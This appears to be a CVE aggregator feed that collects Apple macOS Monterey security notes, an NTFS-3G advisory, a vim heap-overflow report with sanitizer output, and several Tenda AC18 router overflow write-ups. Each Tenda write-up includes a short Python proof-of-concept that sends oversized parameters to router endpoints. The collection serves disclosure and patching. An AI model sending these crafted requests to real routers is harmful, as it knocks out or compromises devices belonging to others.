An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. An application may be able to execute arbitrary code with kernel privileges.

Released May 16, 2022

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26772: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-26741: ABC Research s.r.o

CVE-2022-26742: ABC Research s.r.o

CVE-2022-26749: ABC Research s.r.o

CVE-2022-26750: ABC Research s.r.o

CVE-2022-26752: ABC Research s.r.o

CVE-2022-26753: ABC Research s.r.o

CVE-2022-26754: ABC Research s.r.o

**apache**

Available for: macOS Monterey

Impact: Multiple issues in apache

Description: Multiple issues were addressed by updating apache to version 2.4.53.

CVE-2021-44224

CVE-2021-44790

CVE-2022-22719

CVE-2022-22720

CVE-2022-22721

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read issue was addressed with improved bounds checking.

CVE-2022-26698: Qi Sun of Trend Micro

**AVEVideoEncoder**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**Contacts**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26694: Wojciech Reguła (@\_r3ggi) of SecuRing

**CVMS**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A memory initialization issue was addressed.

CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori

CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

**DriverKit**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**ImageIO**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Monterey

Impact: Photo location information may persist after it is removed with Preview Inspector

Description: A logic issue was addressed with improved state management.

CVE-2022-26725: Andrew Williams and Avi Drissman of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26769: Antonio Zekic (@antoniozekic)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro Zero Day Initiative

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-26756: Jack Dates of RET2 Systems, Inc

**IOKit**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26768: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved code execution in macOS Recovery may be able to escalate to kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26743: Jordy Zomer (@pwningsystems)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: macOS Monterey

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Monterey

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: macOS Monterey

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**LaunchServices**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: The issue was addressed with additional permissions checks.

CVE-2022-26767: Wojciech Reguła (@\_r3ggi) of SecuRing

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: This issue was addressed with improved checks.

CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@\_mxms) of the Google Security Team

CVE-2022-26708: Max Shavrick (@\_mxms) of the Google Security Team

**libresolv**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow was addressed with improved input validation.

CVE-2022-26775: Max Shavrick (@\_mxms) of the Google Security Team

**LibreSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: A denial of service issue was addressed with improved input validation.

CVE-2022-0778

**libxml2**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**OpenSSL**

Available for: macOS Monterey

Impact: Processing a maliciously crafted certificate may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-0778

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26712: Mickey Jin (@patch1t)

**PackageKit**

Available for: macOS Monterey

Impact: A malicious application may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2022-26727: Mickey Jin (@patch1t)

**Preview**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-26693: Wojciech Reguła (@\_r3ggi) of SecuRing

**Printing**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-26746: @gorelics

**Safari Private Browsing**

Available for: macOS Monterey

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: macOS Monterey

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds read issue was addressed with improved input validation.

CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

**SMB**

Available for: macOS Monterey

Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26723: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: A malicious application may be able to access restricted files

Description: This issue was addressed with improved entitlements.

CVE-2022-26728: Mickey Jin (@patch1t)

**Spotlight**

Available for: macOS Monterey

Impact: An app may be able to gain elevated privileges

Description: A validation issue existed in the handling of symlinks and was addressed with improved validation of symlinks.

CVE-2022-26704: an anonymous researcher

**TCC**

Available for: macOS Monterey

Impact: An app may be able to capture a user's screen

Description: This issue was addressed with improved checks.

CVE-2022-26726: an anonymous researcher

**Tcl**

Available for: macOS Monterey

Impact: A malicious application may be able to break out of its sandbox

Description: This issue was addressed with improved environment sanitization.

CVE-2022-26755: Arsenii Kostromin (0x3c3e)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: macOS Monterey

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26761: Wang Yu of Cyberserval

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

**zip**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to a denial of service

Description: A denial of service issue was addressed with improved state handling.

CVE-2022-0530

**zlib**

Available for: macOS Monterey

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-25032: Tavis Ormandy

**zsh**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause arbitrary code execution

Description: This issue was addressed by updating to zsh version 5.8.1.

CVE-2021-45444

CVE-2022-26738: About the security content of macOS Monterey 12.4

An event handler validation issue in the XPC Services API was addressed by removing the service. This issue is fixed in macOS Monterey 12.2. An application may be able to delete files for which it does not have permission.

Released January 26, 2022

**AMD Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22586: an anonymous researcher

**ColorSync**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22584: Mickey Jin (@patch1t) of Trend Micro

**Crash Reporter**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22578: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry updated May 25, 2022

**iCloud**

Available for: macOS Monterey

Impact: An application may be able to access a user's files

Description: An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization.

CVE-2022-22585: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (https://xlab.tencent.com)

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22591: Antonio Zekic (@antoniozekic) of Diverto

**IOMobileFrameBuffer**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-22587: an anonymous researcher, Meysam Firouzi (@R00tkitSMM) of MBition - Mercedes-Benz Innovation Lab, Siddharth Aeri (@b1n4r1b01)

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-22593: Peter Nguyễn Vũ Hoàng of STAR Labs

**Model I/O**

Available for: macOS Monterey

Impact: Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution

Description: An information disclosure issue was addressed with improved state management.

CVE-2022-22579: Mickey Jin (@patch1t) of Trend Micro

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to delete files for which it does not have permission

Description: An event handler validation issue in the XPC Services API was addressed by removing the service. 

CVE-2022-22676: Mickey Jin (@patch1t) of Trend Micro

Entry added May 25, 2022

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to access restricted files

Description: A permissions issue was addressed with improved validation.

CVE-2022-22583: Ron Hass (@ronhass7) of Perception Point, Mickey Jin (@patch1t)

Entry updated May 25, 2022

**WebKit**

Available for: macOS Monterey

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22590: Toan Pham from Team Orca of Sea Security (security.sea.com)

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may prevent Content Security Policy from being enforced

Description: A logic issue was addressed with improved state management.

CVE-2022-22592: Prakash (@1lastBr3ath)

**WebKit Storage**

Available for: macOS Monterey

Impact: A website may be able to track sensitive user information

Description: A cross-origin issue in the IndexDB API was addressed with improved input validation.

CVE-2022-22594: Martin Bajanik of FingerprintJS

CVE-2022-22676: About the security content of macOS Monterey 12.2

A crafted NTFS image can cause a heap-based buffer overflow in ntfs_check_log_client_array in NTFS-3G through 2021.8.22.

Security vulnerabilities were identified in the open source NTFS-3G and  
NTFSPROGS software. These vulnerabilities were confirmed and resolved.  
To our knowledge, these vulnerabilities have not been exploited.

These vulnerabilities may allow an attacker using a maliciously crafted  
NTFS-formatted image file or external storage to potentially execute  
arbitrary privileged code, if the attacker has either local access and  
the ntfs-3g binary is setuid root, or if the attacker has physical  
access to an external port to a computer which is configured to run the  
ntfs-3g binary or one of the ntfsprogs tools when the external storage  
is plugged into the computer. These vulnerabilities result from  
incorrect validation of some of the NTFS metadata that could potentially  
cause buffer overflows, which could be exploited by an attacker. Common  
ways for attackers to gain physical access to a machine is through  
social engineering or an evil maid attack on an unattended computer.

We recommend installing and applying the update with the security fixes,  
and advise to follow security guidance and frameworks such as NIST for  
assessing and improving an organization’s abilities to prevent, detect,  
and respond to security threats and cyber attacks.

AFFECTED PRODUCTS: All previous versions of open source NTFS-3G and  
NTFSPROGS.

WORKAROUND: None

SOLUTION: Upgrade to 2022.5.17

PROJECT URL: https://github.com/tuxera/ntfs-3g

ADVISORY ID: NTFS3G-SA-2022-0001

ISSUE DATE: 2022-05-26

SEVERITY: Moderate

CVEs: CVE-2021-46790, CVE-2022-30784, CVE-2022-30786, CVE-2022-30788, CVE-2022-30789

CVSS SCORE: 5.0-6.7

CVE-2022-30789

Tenda AC Seris Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function fromAddressNat

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v9 and v8, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" \* 0x200
url += "&mitInterface=" + "a" \* 0x200

response \= requests.get(url)

**Timeline**

*   2022-05-05: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30472)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30472: VulnRepo/IoT/Tenda/1 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetClientState request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetClientState.

In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/SetClientState, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetClientState?"
url += "limitEn=1&deviceId=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30477)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30477: VulnRepo/IoT/Tenda/4 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/SetFirewallCfg page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function formSetFirewallCfg.

In function formSetFirewallCfg it reads user provided parameter firewallEn into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer dest.

So by requesting the page /goform/SetFirewallCfg, the attacker can easily perform a **Deny of Service Attack** or **Remote Code Execution** with carefully crafted overflow data.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/SetFirewallCfg?"
url += "firewallEn=" + "s" \* 0x500

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30476)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30476: VulnRepo/IoT/Tenda/6 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat it reads user provided parameter wpapsk_crypto into victim_buf, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/WifiExtraSet?"
url += "wl\_mode=not\_ap&security=wpapsk&wpapsk\_key=kkkkkkkk&wpapsk\_crypto=" + "s" \* 0x600

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30475)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function form_fast_setting_wifi_set.

In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/fast\_setting\_wifi\_set?"
url += "ssid=" + "s" \* 100

response \= requests.get(url)

**Timeline**

*   2022-05-06: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30473)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30473: VulnRepo/IoT/Tenda/2 at master · lcyfrank/VulnRepo

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

**Description**

Heap-based Buffer Overflow in function utf\_head\_off at mbyte.c:3872

**vim Version**

    git log 
    commit 68e64d2c1735f2a39afa8a0475ae29bedb116684 (HEAD -> master, tag: v8.2.5006, origin/master, origin/HEAD)
    

**POC**

    ./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc_h6_s.dat -c :qa!
    =================================================================
    ==48342==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000860f at pc 0x000000a467fd bp 0x7fffffff6800 sp 0x7fffffff67f8
    READ of size 1 at 0x60200000860f thread T0
        #0 0xa467fc in utf_head_off /home/fuzz/fuzz/vim/vim/src/mbyte.c:3872:9
        #1 0xe02062 in do_put /home/fuzz/fuzz/vim/vim/src/register.c:2223:7
        #2 0xb6dbb3 in nv_put_opt /home/fuzz/fuzz/vim/vim/src/normal.c:7351:2
        #3 0xb55466 in nv_brackets /home/fuzz/fuzz/vim/vim/src/normal.c:4514:2
        #4 0xb1fed1 in normal_cmd /home/fuzz/fuzz/vim/vim/src/normal.c:930:5
        #5 0x813d5e in exec_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8762:6
        #6 0x813588 in exec_normal_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8725:5
        #7 0x813139 in ex_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8643:6
        #8 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #9 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #10 0xe57a2c in do_source_ext /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1674:5
        #11 0xe54486 in do_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1801:12
        #12 0xe53dbc in cmd_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1174:14
        #13 0xe5349e in ex_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1200:2
        #14 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #15 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #16 0x7cdc51 in do_cmdline_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:586:12
        #17 0x1423782 in exe_commands /home/fuzz/fuzz/vim/vim/src/main.c:3106:2
        #18 0x141f91b in vim_main2 /home/fuzz/fuzz/vim/vim/src/main.c:780:2
        #19 0x1415015 in main /home/fuzz/fuzz/vim/vim/src/main.c:432:12
        #20 0x7ffff7bec082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #21 0x41ea6d in _start (/home/fuzz/fuzz/vim/vim/src/vim+0x41ea6d)
    
    0x60200000860f is located 1 bytes to the left of 1-byte region [0x602000008610,0x602000008611)
    allocated by thread T0 here:
        #0 0x499ccd in malloc (/home/fuzz/fuzz/vim/vim/src/vim+0x499ccd)
        #1 0x4cb3aa in lalloc /home/fuzz/fuzz/vim/vim/src/alloc.c:246:11
        #2 0x4cb28a in alloc /home/fuzz/fuzz/vim/vim/src/alloc.c:151:12
        #3 0xf8c1f6 in vim_strsave /home/fuzz/fuzz/vim/vim/src/strings.c:27:9
        #4 0xdf2757 in get_register /home/fuzz/fuzz/vim/vim/src/register.c:310:25
        #5 0xb6cfa7 in nv_put_opt /home/fuzz/fuzz/vim/vim/src/normal.c:7307:10
        #6 0xb55466 in nv_brackets /home/fuzz/fuzz/vim/vim/src/normal.c:4514:2
        #7 0xb1fed1 in normal_cmd /home/fuzz/fuzz/vim/vim/src/normal.c:930:5
        #8 0x813d5e in exec_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8762:6
        #9 0x813588 in exec_normal_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8725:5
        #10 0x813139 in ex_normal /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:8643:6
        #11 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #12 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #13 0xe57a2c in do_source_ext /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1674:5
        #14 0xe54486 in do_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1801:12
        #15 0xe53dbc in cmd_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1174:14
        #16 0xe5349e in ex_source /home/fuzz/fuzz/vim/vim/src/scriptfile.c:1200:2
        #17 0x7dc249 in do_one_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:2567:2
        #18 0x7c9005 in do_cmdline /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:992:17
        #19 0x7cdc51 in do_cmdline_cmd /home/fuzz/fuzz/vim/vim/src/ex_docmd.c:586:12
        #20 0x1423782 in exe_commands /home/fuzz/fuzz/vim/vim/src/main.c:3106:2
        #21 0x141f91b in vim_main2 /home/fuzz/fuzz/vim/vim/src/main.c:780:2
        #22 0x1415015 in main /home/fuzz/fuzz/vim/vim/src/main.c:432:12
        #23 0x7ffff7bec082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/fuzz/vim/vim/src/mbyte.c:3872:9 in utf_head_off
    Shadow bytes around the buggy address:
      0x0c047fff9070: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff9080: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff90b0: fa fa fd fa fa fa 02 fa fa fa 04 fa fa fa 01 fa
    =>0x0c047fff90c0: fa[fa]01 fa fa fa 02 fa fa fa 01 fa fa fa 01 fa
      0x0c047fff90d0: fa fa 01 fa fa fa 02 fa fa fa fd fd fa fa fd fa
      0x0c047fff90e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa 00 04
      0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fa fa
      0x0c047fff9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==48342==ABORTING
    

poc\_h6\_s.dat

**Impact**

This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution.

CVE-2022-1886: Heap-based Buffer Overflow in function utf_head_off in vim

This advisory contains mitigations for Out-of-bounds Write, Out-of-bounds Read, and Heap-based Buffer Overflow vulnerabilities in Horner Automation Cscape PLC management software.

Tag

#buffer_overflow